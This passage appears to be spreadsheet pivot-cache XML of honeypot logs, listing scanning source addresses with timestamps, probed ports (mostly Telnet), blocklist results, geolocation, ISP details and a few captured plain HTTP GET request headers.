    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:b47b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2971"/>
    <x v="2971"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:00:52"/>
    <d v="2024-11-22T13:38:26"/>
    <d v="2025-04-05T18:00:52"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23&amp;&amp;59364&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="New Delhi (Okhla)"/>
    <s v="1261481"/>
    <s v="110020"/>
    <s v="28.5317"/>
    <s v="77.2766"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7ab0:3560"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2972"/>
    <x v="2972"/>
    <s v="NA&amp;&amp;125-229-231-164.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T18:00:52"/>
    <d v="2024-12-26T02:27:20"/>
    <d v="2025-04-05T18:00:52"/>
    <n v="274"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="23&amp;&amp;NA&amp;&amp;9100"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:e7a4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2973"/>
    <x v="2973"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:43:57"/>
    <d v="2025-04-05T17:43:57"/>
    <d v="2025-04-05T17:43:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="67"/>
    <s v="Nam Định Province"/>
    <s v="Thành Phố Nam Định"/>
    <s v="Nam Định"/>
    <s v="1573517"/>
    <s v="NA"/>
    <s v="20.4339"/>
    <s v="106.177"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel Corporation"/>
    <s v="consumer"/>
    <s v="Vietel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abe9:f17d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2974"/>
    <x v="2974"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:33:27"/>
    <d v="2025-04-05T17:33:27"/>
    <d v="2025-04-05T17:33:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:4fc4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2975"/>
    <x v="2975"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:27:52"/>
    <d v="2025-04-05T17:27:52"/>
    <d v="2025-04-05T17:27:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="BSNL GSM EastZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:1ac0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2976"/>
    <x v="2976"/>
    <s v="NA&amp;&amp;36-233-73-68.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T17:24:53"/>
    <d v="2025-04-05T15:37:48"/>
    <d v="2025-04-05T17:24:53"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="23"/>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2011-01-20"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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24e9:4944"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2977"/>
    <x v="2977"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:24:00"/>
    <d v="2025-04-05T17:24:00"/>
    <d v="2025-04-05T17:24:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3615"/>
    <s v="114.133"/>
    <s v="137872"/>
    <s v="PEOPLESPHONE-HK"/>
    <s v="China Mobile Hong Kong Company Limited"/>
    <s v="consumer"/>
    <s v="China Mobile Hong Kong Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:df7a:a1c9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2978"/>
    <x v="2978"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:20:31"/>
    <d v="2025-04-05T17:20:31"/>
    <d v="2025-04-05T17:20:31"/>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RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:b149"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2979"/>
    <x v="2979"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:09:03"/>
    <d v="2025-04-05T13:31:01"/>
    <d v="2025-04-05T17:09:03"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:8119"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2980"/>
    <x v="2980"/>
    <s v="59-126-205-125.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:00:49"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-05T17:00:49"/>
    <n v="409"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_DHCP_H15&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;7539&amp;&amp;67&amp;&amp;54561&amp;&amp;23&amp;&amp;43243&amp;&amp;33602&amp;&amp;33608&amp;&amp;33615&amp;&amp;NA&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:cd7d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2981"/>
    <x v="2981"/>
    <s v="59-127-236-50.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T17:00:49"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-05T17:00:49"/>
    <n v="298"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;59722&amp;&amp;23&amp;&amp;80&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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:ec32"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2982"/>
    <x v="2982"/>
    <s v="syn-104-229-106-113.res.spectrum.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T16:51:24"/>
    <d v="2025-02-08T16:50:59"/>
    <d v="2025-04-05T16:51:24"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Oneida"/>
    <s v="Utica"/>
    <s v="5142056"/>
    <s v="13502"/>
    <s v="43.1467"/>
    <s v="-75.1779"/>
    <s v="11351"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications Inc"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="2014-10-07"/>
    <s v="RRNY"/>
    <s v="2014-10-07"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-07-27 04:00:00"/>
    <s v="2025-07-26 04:00:00"/>
    <s v="2024-07-22 05:41:39"/>
    <s v="['NS1.CHARTER.COM', 'NS2.CHARTER.COM', 'NS3.CHARTER.COM', 'NS4.CHARTER.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Domain Admin"/>
    <x v="19"/>
    <s v="NA"/>
    <s v="12405 Powerscourt Drive"/>
    <s v="::ffff:68e5:6a71"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2983"/>
    <x v="2983"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T16:42:41"/>
    <d v="2025-04-05T08:06:22"/>
    <d v="2025-04-05T16:42:41"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:59b6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2984"/>
    <x v="2984"/>
    <s v="bband-dyn118.178-41-217.t-com.sk&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T16:41:35"/>
    <d v="2025-04-04T15:14:57"/>
    <d v="2025-04-05T16:41:35"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SK"/>
    <s v="Slovakia"/>
    <s v="NI"/>
    <s v="Nitra Region"/>
    <s v="Nitra District"/>
    <s v="Nitra"/>
    <s v="3058531"/>
    <s v="NA"/>
    <s v="48.3076"/>
    <s v="18.0845"/>
    <s v="6855"/>
    <s v="Slovak Telekom, a.s."/>
    <s v="Slovak Telekom, a.s."/>
    <s v="residential"/>
    <s v="ST-DYNBBAND"/>
    <s v="2010-02-02"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2003-09-23 00:00:00"/>
    <s v="2025-09-23 00:00:00"/>
    <s v="2024-09-10 00:00:00"/>
    <s v="['ns.telecom.sk', 'ns2.telecom.sk']"/>
    <s v="Key-Systems GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b229:d976"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2985"/>
    <x v="2985"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T16:09:58"/>
    <d v="2025-04-05T16:09:58"/>
    <d v="2025-04-05T16:09:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7505:bbc8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2986"/>
    <x v="2986"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T16:03:51"/>
    <d v="2025-04-05T16:03:51"/>
    <d v="2025-04-05T16:03:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
